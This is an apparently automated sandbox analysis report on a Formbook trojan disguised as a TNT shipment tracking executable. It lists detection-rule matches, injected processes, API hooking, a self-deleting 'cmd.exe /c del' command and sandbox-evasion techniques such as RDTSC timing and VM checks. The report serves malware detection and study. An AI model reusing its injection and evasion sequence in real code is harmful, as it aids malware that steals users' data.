Source: 00000002.00000002.1508191054.0000000002BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1508191054.0000000002BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.1508191054.0000000002BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.3834260366.0000000003290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.3834260366.0000000003290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.3834260366.0000000003290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: TNT AWB TRACKING DETAILS.exe PID: 7420, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 7524, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: wlanext.exe PID: 7568, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: classification engine | Classification label: mal100.troj.evad.winEXE@304/1@12/5
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_0044AF6C GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_006F3355 memset,GetCurrentProcess,OpenProcessToken,GetLastError,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_0046CB5F OleInitialize,CLSIDFromProgID,CLSIDFromString,CoCreateInstance,CoInitializeSecurity,_wcslen,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7660:120:WilError_03
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | File created: C:\Users\user\AppData\Local\Temp\antholite
Source: TNT AWB TRACKING DETAILS.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: TNT AWB TRACKING DETAILS.exe | ReversingLabs: Detection: 52%
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | File read: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe
Source: unknown | Process created: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe"
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe"
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\wlanext.exe "C:\Windows\SysWOW64\wlanext.exe"
Source: C:\Windows\SysWOW64\wlanext.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Section loaded: apphelp.dll
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Section loaded: wsock32.dll
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Section loaded: version.dll
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Section loaded: winmm.dll
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Section loaded: mpr.dll
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Section loaded: wininet.dll
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Section loaded: userenv.dll
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Section loaded: uxtheme.dll
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Section loaded: windows.storage.dll
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Section loaded: wldp.dll
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Section loaded: kernel.appcore.dll
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Section loaded: msdart.dll
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Section loaded: sxs.dll
          Source: C:\Windows\explorer.exe | Section loaded: vcruntime140_1.dll
          Source: C:\Windows\explorer.exe | Section loaded: vcruntime140.dll
          Source: C:\Windows\explorer.exe | Section loaded: msvcp140.dll
          Source: C:\Windows\explorer.exe | Section loaded: windows.internal.shell.broker.dll
          Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: wininet.dll
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: TNT AWB TRACKING DETAILS.exe | Static file information: File size 1135963 > 1048576
          Source: Binary string: wntdll.pdbUGP source: TNT AWB TRACKING DETAILS.exe, 00000000.00000003.1449263354.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, TNT AWB TRACKING DETAILS.exe, 00000000.00000003.1448562285.0000000004550000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1450733761.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1508845301.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1508845301.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1452328610.0000000003200000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000004.00000002.3839397087.0000000003A3E000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000004.00000003.1510180588.00000000036EF000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000004.00000002.3839397087.00000000038A0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000004.00000003.1508121602.000000000353E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: TNT AWB TRACKING DETAILS.exe, 00000000.00000003.1449263354.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, TNT AWB TRACKING DETAILS.exe, 00000000.00000003.1448562285.0000000004550000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1450733761.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1508845301.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1508845301.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1452328610.0000000003200000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, wlanext.exe, 00000004.00000002.3839397087.0000000003A3E000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000004.00000003.1510180588.00000000036EF000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000004.00000002.3839397087.00000000038A0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000004.00000003.1508121602.000000000353E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wlanext.pdb source: svchost.exe, 00000002.00000003.1507427933.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1508246439.0000000002BE0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.1507541868.0000000002E2E000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, wlanext.exe, 00000004.00000002.3831257030.00000000006F0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdb source: explorer.exe, 00000003.00000002.3861185504.000000001040F000.00000004.80000000.00040000.00000000.sdmp, wlanext.exe, 00000004.00000002.3844546010.0000000003DEF000.00000004.10000000.00040000.00000000.sdmp, wlanext.exe, 00000004.00000002.3834313158.00000000032D1000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: explorer.exe, 00000003.00000002.3861185504.000000001040F000.00000004.80000000.00040000.00000000.sdmp, wlanext.exe, 00000004.00000002.3844546010.0000000003DEF000.00000004.10000000.00040000.00000000.sdmp, wlanext.exe, 00000004.00000002.3834313158.00000000032D1000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wlanext.pdbGCTL source: svchost.exe, 00000002.00000003.1507427933.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1508246439.0000000002BE0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.1507541868.0000000002E2E000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000004.00000002.3831257030.00000000006F0000.00000040.80000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress, 0_2_0040EBD0
          Source: TNT AWB TRACKING DETAILS.exe | Static PE information: real checksum: 0xa961f should be: 0x119557
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041F18F pushfd ; ret 2_2_0041F190
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00416A48 push ecx; ret 2_2_00416A4A
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040E462 push C7DC0245h; retf 2_2_0040E46B
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041D4D2 push eax; ret 2_2_0041D4D8
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041D4DB push eax; ret 2_2_0041D542
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041D485 push eax; ret 2_2_0041D4D8
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041D53C push eax; ret 2_2_0041D542
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041E5FF push es; ret 2_2_0041E600
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041774B push edi; retf 2_2_00417755
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0340225F pushad ; ret 2_2_034027F9
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034027FA pushad ; ret 2_2_034027F9
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034309AD push ecx; mov dword ptr [esp], ecx 2_2_034309B6
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0340283D push eax; iretd 2_2_03402858
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0340135E push eax; iretd 2_2_03401369
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0384EB02 push esp; retn 0000h 2_2_0384EB03
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0384EB1E push esp; retn 0000h 2_2_0384EB1F
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0384E9B5 push esp; retn 0000h 2_2_0384EAE7
          Source: C:\Windows\explorer.exe | Code function: 3_2_0B1BEB1E push esp; retn 0000h 3_2_0B1BEB1F
          Source: C:\Windows\explorer.exe | Code function: 3_2_0B1BEB02 push esp; retn 0000h 3_2_0B1BEB03
          Source: C:\Windows\explorer.exe | Code function: 3_2_0B1BE9B5 push esp; retn 0000h 3_2_0B1BEAE7
          Source: C:\Windows\explorer.exe | Code function: 3_2_10C749B5 push esp; retn 0000h 3_2_10C74AE7
          Source: C:\Windows\explorer.exe | Code function: 3_2_10C74B02 push esp; retn 0000h 3_2_10C74B03
          Source: C:\Windows\explorer.exe | Code function: 3_2_10C74B1E push esp; retn 0000h 3_2_10C74B1F
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0070003D push ecx; ret 4_2_00700050
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_038A225F pushad ; ret 4_2_038A27F9
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_038A27FA pushad ; ret 4_2_038A27F9
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_038D09AD push ecx; mov dword ptr [esp], ecx 4_2_038D09B6
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_038A283D push eax; iretd 4_2_038A2858
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_038A1368 push eax; iretd 4_2_038A1369
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_030EF18F pushfd ; ret 4_2_030EF190

          Hooking and other Techniques for Hiding and Protection

          Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8A 0xAE 0xEA
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_0047A330
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00434418
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wlanext.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | API/Special instruction interceptor: Address: 3F3CAC4
          Source: C:\Windows\SysWOW64\svchost.exe | API/Special instruction interceptor: Address: 7FF90818D324
          Source: C:\Windows\SysWOW64\svchost.exe | API/Special instruction interceptor: Address: 7FF908190774
          Source: C:\Windows\SysWOW64\svchost.exe | API/Special instruction interceptor: Address: 7FF908190154
          Source: C:\Windows\SysWOW64\svchost.exe | API/Special instruction interceptor: Address: 7FF90818D8A4
          Source: C:\Windows\SysWOW64\svchost.exe | API/Special instruction interceptor: Address: 7FF90818DA44
          Source: C:\Windows\SysWOW64\svchost.exe | API/Special instruction interceptor: Address: 7FF90818D1E4
          Source: C:\Windows\SysWOW64\wlanext.exe | API/Special instruction interceptor: Address: 7FF90818D324
          Source: C:\Windows\SysWOW64\wlanext.exe | API/Special instruction interceptor: Address: 7FF908190774
          Source: C:\Windows\SysWOW64\wlanext.exe | API/Special instruction interceptor: Address: 7FF90818D944
          Source: C:\Windows\SysWOW64\wlanext.exe | API/Special instruction interceptor: Address: 7FF90818D504
          Source: C:\Windows\SysWOW64\wlanext.exe | API/Special instruction interceptor: Address: 7FF90818D544
          Source: C:\Windows\SysWOW64\wlanext.exe | API/Special instruction interceptor: Address: 7FF90818D1E4
          Source: C:\Windows\SysWOW64\wlanext.exe | API/Special instruction interceptor: Address: 7FF908190154
          Source: C:\Windows\SysWOW64\wlanext.exe | API/Special instruction interceptor: Address: 7FF90818D8A4
          Source: C:\Windows\SysWOW64\wlanext.exe | API/Special instruction interceptor: Address: 7FF90818DA44
          Source: C:\Windows\SysWOW64\svchost.exe | RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exe | RDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exe | RDTSC instruction interceptor: First address: 30D9904 second address: 30D990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exe | RDTSC instruction interceptor: First address: 30D9B7E second address: 30D9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00409AB0 rdtsc 2_2_00409AB0
          Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 9784
          Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 875
          Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 884
          Source: C:\Windows\SysWOW64\wlanext.exe | Window / User API: threadDelayed 9757
          Source: C:\Windows\explorer.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-88126
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | API coverage: 3.7 %
          Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 2.0 %
          Source: C:\Windows\SysWOW64\wlanext.exe | API coverage: 1.8 %
          Source: C:\Windows\explorer.exe TID: 7948 | Thread sleep count: 9784 > 30
          Source: C:\Windows\explorer.exe TID: 7948 | Thread sleep time: -19568000s >= -30000s
          Source: C:\Windows\explorer.exe TID: 7948 | Thread sleep count: 157 > 30
          Source: C:\Windows\explorer.exe TID: 7948 | Thread sleep time: -314000s >= -30000s
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 7892 | Thread sleep count: 215 > 30
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 7892 | Thread sleep time: -430000s >= -30000s
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 7892 | Thread sleep count: 9757 > 30
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 7892 | Thread sleep time: -19514000s >= -30000s
          Source: C:\Windows\SysWOW64\wlanext.exe | Last function: Thread delayed
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00452492
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00442886
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_004788BD
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_004339B6
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose, 0_2_0045CAFA
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00431A86
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, 0_2_0044BD27
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_0045DE8F FindFirstFileW,FindClose, 0_2_0045DE8F
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_0044BF8B
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary, 0_2_0040E500
          Source: explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Be8M
          Source: explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000002.3852590105.000000000888E000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: 2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}=
          Source: explorer.exe, 00000003.00000002.3853190566.0000000008979000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00`
          Source: explorer.exe, 00000003.00000003.2290728057.00000000087C0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NXTVMWare
          Source: explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ata\Af7Nc
